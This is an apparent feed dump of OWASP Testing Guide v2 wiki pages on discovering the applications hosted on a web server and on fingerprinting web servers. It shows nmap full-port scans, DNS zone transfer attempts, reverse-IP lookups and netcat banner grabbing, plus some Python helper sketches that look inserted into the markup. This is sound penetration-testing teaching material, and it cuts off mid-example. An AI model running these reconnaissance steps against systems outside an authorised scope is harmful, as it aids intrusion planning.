&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&lt;br /&gt;
* DNS lookup tools such as ''nslookup'', ''dig'' or similar. &lt;br /&gt;
* Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &lt;br /&gt;
* Search engines (Google, and other major engines). &lt;br /&gt;
* Specialized DNS-related web-based search service: see text.&lt;br /&gt;
* nmap - http://www.insecure.org &lt;br /&gt;
* Nessus Vulnerability Scanner - http://www.nessus.org &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=14829</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=14829"/>
				<updated>2007-01-02T20:09:17Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents#Web_Application_Penetration_Testing Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A paramount step for testing for web application vulnerabilities is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or exfiltrate data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without direct reference from the main website/application: this is true for internal and/or extranet websites which could be misconfigured or not updated due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use a common path for administrative interfaces which can be used to guess or brute force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve to the same IP address (this scenario is not limited to hosting environments, but also applies to ordinary corporate environments as well).&lt;br /&gt;
&lt;br /&gt;
As a security professional, you are sometimes given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but, in any case, it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is that the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a number of web applications associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, only some of them, or none at all because you fail to notice them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client may not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e. it should identify all the applications accessible through the given target. In the following examples, we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Note&amp;lt;/u&amp;gt;: Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated with three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications this way, unless you don’t want them to be accessible in a standard way and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not actually necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content by means of so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
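As a minimal sketch of this probing technique, the following Python fragment builds the raw HTTP/1.1 requests one might send to the same IP address while varying the ''Host:'' header; the host names are the hypothetical ones used above. Comparing the responses reveals which names serve distinct content.

```python
# Sketch: probing candidate virtual hosts by varying the HTTP/1.1 Host header.
# The host names below are the hypothetical examples from the text.

def build_vhost_request(host: str, path: str = "/") -> bytes:
    """Build a minimal HTTP/1.1 HEAD request for the given virtual host."""
    return (
        f"HEAD {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")

candidates = ["www.example.com", "helpdesk.example.com", "webmail.example.com"]
probe_requests = {name: build_vhost_request(name) for name in candidates}
```

Each request would then be sent to the target IP (e.g., over a plain socket) and the responses compared.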
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standardly named web applications; being non-standard, there is no magic recipe for finding them. However, we may employ a few criteria that will aid in the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'', we could, for example, do a bit of googling using the ''site'' operator and examine the result of a query for “site:www.example.com”. Among the returned URLs, there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to give this information to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) may yield results. Vulnerability scanners may help in this respect.&lt;br /&gt;
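Such dictionary-style guessing can be sketched as follows; the word list and base URL below are illustrative assumptions, not a real dictionary, and each generated URL would then be requested to see whether it returns something other than an error page.

```python
# Sketch: dictionary-style guessing of unpublished application URLs.
# COMMON_PATHS is a tiny illustrative word list, not an exhaustive dictionary.

COMMON_PATHS = ["webmail", "admin", "manager/html", "phpmyadmin", "intranet"]

def candidate_urls(base: str, paths=COMMON_PATHS):
    """Return candidate URLs to probe under the given base URL."""
    return [f"{base.rstrip('/')}/{p}" for p in paths]

urls = candidate_urls("https://www.example.com")
```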
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -P0 -sT -sV -p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and look for http or the indication of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is in fact an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (note, however, that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
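As a rough sketch of how the manual inspection above can be automated, the following fragment extracts candidate web services from nmap's normal output; the sample is an abbreviated copy of the scan output shown above, and any port labeled http (or SSL-wrapped) is a candidate to probe further.

```python
import re

# Sketch: extracting candidate web services from nmap's normal output.
# NMAP_OUTPUT is an abbreviated copy of the sample scan shown in the text.

NMAP_OUTPUT = """\
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))
443/tcp   open  ssl         OpenSSL
901/tcp   open  http        Samba SWAT administration server
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
"""

def web_candidates(output: str):
    """Return (port, service) pairs whose service looks like http or SSL-wrapped."""
    pairs = []
    for line in output.splitlines():
        m = re.match(r"(\d+)/tcp\s+open\s+(\S+)", line)
        if m and ("http" in m.group(2) or "ssl" in m.group(2)):
            pairs.append((int(m.group(1)), m.group(2)))
    return pairs
```

Each candidate port would then be probed (with a browser, telnet, or a raw request) to confirm whether it actually speaks http or https.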
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers, but it may be worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Example: identifying www.owasp.org name servers by using host&lt;br /&gt;
&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider those that are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers&lt;br /&gt;
&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
-bash-2.05b$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
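For illustration, the in-addr.arpa name used by such an inverse query can be derived mechanically from the IP address; a minimal sketch (in practice you would then query this name for a PTR record, e.g. with ''host'' or ''dig''):

```python
# Sketch: constructing the reverse (PTR) lookup name for an IPv4 address.
# The resulting name is what an inverse DNS query actually asks about.

def ptr_name(ipv4: str) -> str:
    """Return the in-addr.arpa name used for an inverse DNS query."""
    octets = ipv4.split(".")
    assert len(octets) == 4 and all(o.isdigit() for o in octets)
    return ".".join(reversed(octets)) + ".in-addr.arpa"
```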
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', then check whether the names you obtain pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following example shows the result of a query to one of the above reverse IP services to 216.48.3.18, the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been revealed.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs. &amp;lt;br&amp;gt;&lt;br /&gt;
For instance, considering the previous example regarding ''www.owasp.org'', you could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of ''webgoat.org'', ''webscarab.com'', ''webscarab.net''.&amp;lt;br&amp;gt;&lt;br /&gt;
Googling techniques are explained in [[Spidering and googling AoC]].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same as listed in Black Box testing, no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
* Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
* Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
* Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Web_Application_Fingerprint_(OWASP-IG-004)&amp;diff=14828</id>
		<title>Testing for Web Application Fingerprint (OWASP-IG-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Web_Application_Fingerprint_(OWASP-IG-004)&amp;diff=14828"/>
				<updated>2007-01-02T19:55:09Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
Web server fingerprinting is a critical task for the Penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
There are several different vendors and versions of web servers on the market today. Knowing the type of web server that you are testing significantly helps in the testing process, and will also change the course of the test. This information can be derived by sending the web server specific commands and analyzing the output, as each version of web server software may respond differently to these commands. By knowing how each type of web server responds to specific commands and keeping this information in a web server fingerprint database, a penetration tester can send these commands to the web server, analyze the response, and compare it to the database of known signatures. Please note that it usually takes several different commands to accurately identify the web server, as different versions may react similarly to the same command. Rarely, however, do different versions react the same to all HTTP commands. So, by sending several different commands, you increase the accuracy of your guess.&lt;br /&gt;
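The fingerprint-database idea can be sketched as follows. The signatures below are illustrative only, distilled from the protocol-behaviour transcripts later in this section (header ordering, HTTP/3.0 and JUNK/1.0 requests); a real tool would use a much richer signature set.

```python
# Sketch of the fingerprint-database idea: each known server maps to the set
# of behaviours it exhibits; the candidate whose signature agrees with the
# most observations wins. Signatures are illustrative, not a real database.

SIGNATURES = {
    "Apache/1.3.23":           {"order": "Date-first",   "HTTP/3.0": "400", "JUNK/1.0": "200"},
    "Microsoft-IIS/5.0":       {"order": "Server-first", "HTTP/3.0": "200", "JUNK/1.0": "400"},
    "Netscape-Enterprise/4.1": {"order": "Server-first", "HTTP/3.0": "505", "JUNK/1.0": "html-error"},
}

def best_match(observed: dict) -> str:
    """Return the known server whose signature agrees with the most observations."""
    score = lambda sig: sum(observed.get(k) == v for k, v in sig.items())
    return max(SIGNATURES, key=lambda name: score(SIGNATURES[name]))
```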
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
The simplest and most basic form of identifying a Web server is to look at the Server field in the HTTP response header. For our experiments we use netcat. &lt;br /&gt;
Consider the following HTTP Request-Response: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc 202.41.76.251 80&lt;br /&gt;
HEAD / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Mon, 16 Jun 2003 02:53:29 GMT&lt;br /&gt;
Server: Apache/1.3.3 (Unix)  (Red Hat/Linux)&lt;br /&gt;
Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT&lt;br /&gt;
ETag: &amp;quot;1813-49b-361b4df6&amp;quot;&lt;br /&gt;
Accept-Ranges: bytes&lt;br /&gt;
Content-Length: 1179&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
From the ''Server'' field, we understand that the server is Apache, version 1.3.3, running on the Red Hat Linux operating system.&lt;br /&gt;
Three examples of the HTTP response headers are shown below:&lt;br /&gt;
&lt;br /&gt;
From an '''Apache 1.3.23''' server: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Date: Sun, 15 Jun 2003 17:10:49 GMT &lt;br /&gt;
Server: Apache/1.3.23 &lt;br /&gt;
Last-Modified: Thu, 27 Feb 2003 03:48:19 GMT &lt;br /&gt;
ETag: 32417-c4-3e5d8a83 &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Content-Length: 196 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
From a '''Microsoft IIS 5.0''' server:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Microsoft-IIS/5.0 &lt;br /&gt;
Expires: Tue, 17 Jun 2003 01:41:33 GMT &lt;br /&gt;
Date: Mon, 16 Jun 2003 01:41:33 GMT &lt;br /&gt;
Content-Type: text/HTML &lt;br /&gt;
Accept-Ranges: bytes &lt;br /&gt;
Last-Modified: Wed, 28 May 2003 15:32:21 GMT &lt;br /&gt;
ETag: b0aac0542e25c31:89d &lt;br /&gt;
Content-Length: 7369 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From a '''Netscape Enterprise 4.1''' server: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 200 OK &lt;br /&gt;
Server: Netscape-Enterprise/4.1 &lt;br /&gt;
Date: Mon, 16 Jun 2003 06:19:04 GMT &lt;br /&gt;
Content-type: text/HTML &lt;br /&gt;
Last-modified: Wed, 31 Jul 2002 15:37:56 GMT &lt;br /&gt;
Content-length: 57 &lt;br /&gt;
Accept-ranges: bytes &lt;br /&gt;
Connection: close &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
However, this testing methodology is not completely reliable. There are several techniques that allow a web site to obfuscate or to modify the server banner string.&lt;br /&gt;
For example, we could obtain the following response:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 403 Forbidden &lt;br /&gt;
Date: Mon, 16 Jun 2003 02:41:27 GMT &lt;br /&gt;
Server: Unknown-Webserver/1.0 &lt;br /&gt;
Connection: close &lt;br /&gt;
Content-Type: text/HTML; charset=iso-8859-1 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this case the server field of that response is obfuscated: we cannot know what type of web server is running.&lt;br /&gt;
&lt;br /&gt;
== Protocol behaviour == &lt;br /&gt;
Refined testing techniques take into consideration various characteristics of the several web servers available on the market. We will list some methodologies that allow us to deduce the type of web server in use.&lt;br /&gt;
&lt;br /&gt;
=== HTTP header field ordering === &lt;br /&gt;
The first method consists of observing the ordering of the several headers in the response. Every web server has its own inner ordering of headers. Consider the following responses as examples:&lt;br /&gt;
&lt;br /&gt;
Response from '''Apache 1.3.23''' &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ nc apache.example.com 80 &lt;br /&gt;
